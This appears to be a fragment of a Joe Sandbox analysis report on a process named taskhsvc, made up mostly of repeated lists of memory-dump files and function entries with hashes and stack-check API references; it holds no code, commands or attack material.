Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort
String ID:
API String ID: 3276312271-0
Opcode ID: 75cd4e53852b232440fa032e5dd5f448c3e32669c0f43d5f7f422d3170e2b7be
Instruction ID: 662bf9557843007db4708c98f7634466a578234dc0be52a540e4e242c9d96c90
Opcode Fuzzy Hash: 75cd4e53852b232440fa032e5dd5f448c3e32669c0f43d5f7f422d3170e2b7be
Instruction Fuzzy Hash: CB0160B490565A9FCB40DFB9D585A9EBBF0FB4C304F10882AE958E7310E374EA058F51

Uniqueness

Uniqueness Score: -1.00%

Function 00D943B5 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00D94415

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 9c02dfc0f9b321c21e6272f13ea9298d9c7cdedae33d8b052e7bb6c4e3bf8360
Instruction ID: 55bbebc98001ae2b28611245dfe5f6aeaa602b9713ba38100a98dd6108a4af33
Opcode Fuzzy Hash: 9c02dfc0f9b321c21e6272f13ea9298d9c7cdedae33d8b052e7bb6c4e3bf8360
Instruction Fuzzy Hash: 3FF0E7B5A0021A9BDF00DFADC985A9EB7F0FF18304F054928E924E7301E370EA06DB94

Uniqueness

Uniqueness Score: -1.00%

Function 00EF6865 Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

__stack_chk_fail.LIBSSP-0 ref: 00EF68C7

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail
String ID:
API String ID: 4216919130-0
Opcode ID: 19c4dcebacd949ea531ae7aee4c177608c4a28979dfd852fd434778bb1b14ac3
Instruction ID: 4d25043712a9afb8f7ae6ca99d66fbac9202af88e538fc396b68f87836d1ca4b
Opcode Fuzzy Hash: 19c4dcebacd949ea531ae7aee4c177608c4a28979dfd852fd434778bb1b14ac3
Instruction Fuzzy Hash: 38019DB4E042099FCB40EFA9C585A9DBBF0FB48314F14982AE958E7340E234A9418F65

Uniqueness

Uniqueness Score: -1.00%

Function 00DC2121 Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

Part of subcall function 00FBC6B3: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DC0D60), ref: 00FBC6D9

Part of subcall function 00DC16C8: abort.MSVCRT ref: 00DC174D
Part of subcall function 00DC16C8: __stack_chk_fail.LIBSSP-0 ref: 00DC2115

__stack_chk_fail.LIBSSP-0 ref: 00DC217F

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort
String ID:
API String ID: 646538096-0
Opcode ID: 17aa416117933bcd9aa906e06d4b6cb3b0647e44c302dd4b13f1d6bd1c371b66
Instruction ID: 2fb2e4f08c6950f36523e0793bb7a135aa99fc61e86943fcffadee6a5f48a82c
Opcode Fuzzy Hash: 17aa416117933bcd9aa906e06d4b6cb3b0647e44c302dd4b13f1d6bd1c371b66
Instruction Fuzzy Hash: 75014B74E0421A9FCB00EFB8C4859ADBBF1AF09200B09C459E854AB356D674A411DF60

Uniqueness

Uniqueness Score: -1.00%

Function 00EFE7FD Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00EFE618: free.MSVCRT ref: 00EFE7DC
Part of subcall function 00EFE618: __stack_chk_fail.LIBSSP-0 ref: 00EFE7F6

__stack_chk_fail.LIBSSP-0 ref: 00EFE852

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
